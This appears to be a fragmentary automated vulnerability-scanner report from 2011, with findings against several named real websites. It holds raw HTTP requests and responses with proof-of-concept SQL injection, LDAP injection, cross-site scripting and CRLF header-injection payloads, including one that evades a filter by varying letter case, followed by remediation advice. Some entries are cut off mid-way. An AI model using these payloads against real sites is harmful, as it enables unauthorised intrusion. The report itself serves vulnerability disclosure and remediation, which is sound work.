GET /help/direct-mail HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Referer: https://www.supermedia.com/help User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00''; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 2
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:39:42 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Cache-Control: private Content-Length: 25146
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Ddirect Mail</title>
<link type="text/css" rel="st ...[SNIP]...
1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/tools/markers_sema.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /tools/markers_sema.php?sema='+OR+'ns'%3/1'd'ns HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 198 Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''d'ns' AND i_emergency_only <> 1 ORDER BY distance' at line 24
The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:14:01 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 197 Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ns'' AND i_emergency_only <> 1 ORDER BY distance' at line 24
Request 2
GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns'' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:14:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 65 Content-Type: text/xml
The X-Mapping-ofcbhgem cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the X-Mapping-ofcbhgem cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Issue background
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
Request 1
GET /ordernow.asp HTTP/1.1 Host: www.hbccards.com Proxy-Connection: keep-alive Referer: http://www.hbccards.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176
Response 1
HTTP/1.1 200 OK Date: Wed, 30 Mar 2011 13:54:29 GMT Server: Microsoft-IIS/7.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET Content-Length: 26877 Set-Cookie: ASPSESSIONIDASCQDSAS=EPKLECJBDJONHADGAAFPJNJJ; path=/ Set-Cookie: X-Mapping-ofcbhgem=87F600579E92D94B86F73C50B28A9011; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" > <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 78a5a--><script>alert(1)</script>c5257cb7950 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request 1
GET /shavlik/index.cfm?m=1009&pg=697&h=78a5a--><script>alert(1)</script>c5257cb7950&hp=70 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Request 2
GET /shavlik/index.cfm?m=1009&pg=697&h=&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 21:02:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload ea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9 was submitted in the REST URL parameter 3. This input was returned as ea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9 in a subsequent request for the URL /xml/order/Home.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Homeea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10 If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4
Request 2
GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c394%0d%0a997748dc239 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6c394%0d%0a997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;hot=fb;hot=tw;u=1x1%7Cbpage%7Cboomerang%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7C%7C840995%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=5299499505? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6c394 997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-: Date: Sat, 26 Mar 2011 20:36:28 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 12a6e%0d%0a3cb4ffd24b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /12a6e%0d%0a3cb4ffd24b0/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 15f52%0d%0a4fdade80305 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /15f52%0d%0a4fdade80305/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 26fba%0d%0a2a7290e692e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /26fba%0d%0a2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/26fba 2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died: Date: Sat, 26 Mar 2011 20:36:24 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4d9cf%0d%0a87bb4119c15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4d9cf%0d%0a87bb4119c15/N6036.AOL/B5125476.4;sz=728x90;click=http%3A//at.atwola.com/adlink%2F5113%2F674622%2F0%2F225%2FAdId%3D1349284%3BBnId%3D3%3Bitime%3D171780247%3Bkvugc%3D0%3Bkvpg%3Dmusic.aol%2Fradioguide%2Fbb%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93232707%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D73001%3Bkvseg%3D99999%3A61674%3A60489%3A60740%3A60490%3A56262%3A61576%3A60493%3A50963%3A60491%3A60515%3A60514%3A52614%3A53656%3A52842%3A56830%3A52615%3A60546%3A56918%3A60500%3A56920%3A56555%3A51133%3A56988%3A56917%3A53435%3A54173%3A56500%3A52611%3A54463%3A56969%3Bkp%3D-1%3Bnodecode%3Dyes%3Blink%3D;ord=171780247? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://music.aol.com/_uac/adpage.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 47115%0d%0af411b5489be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
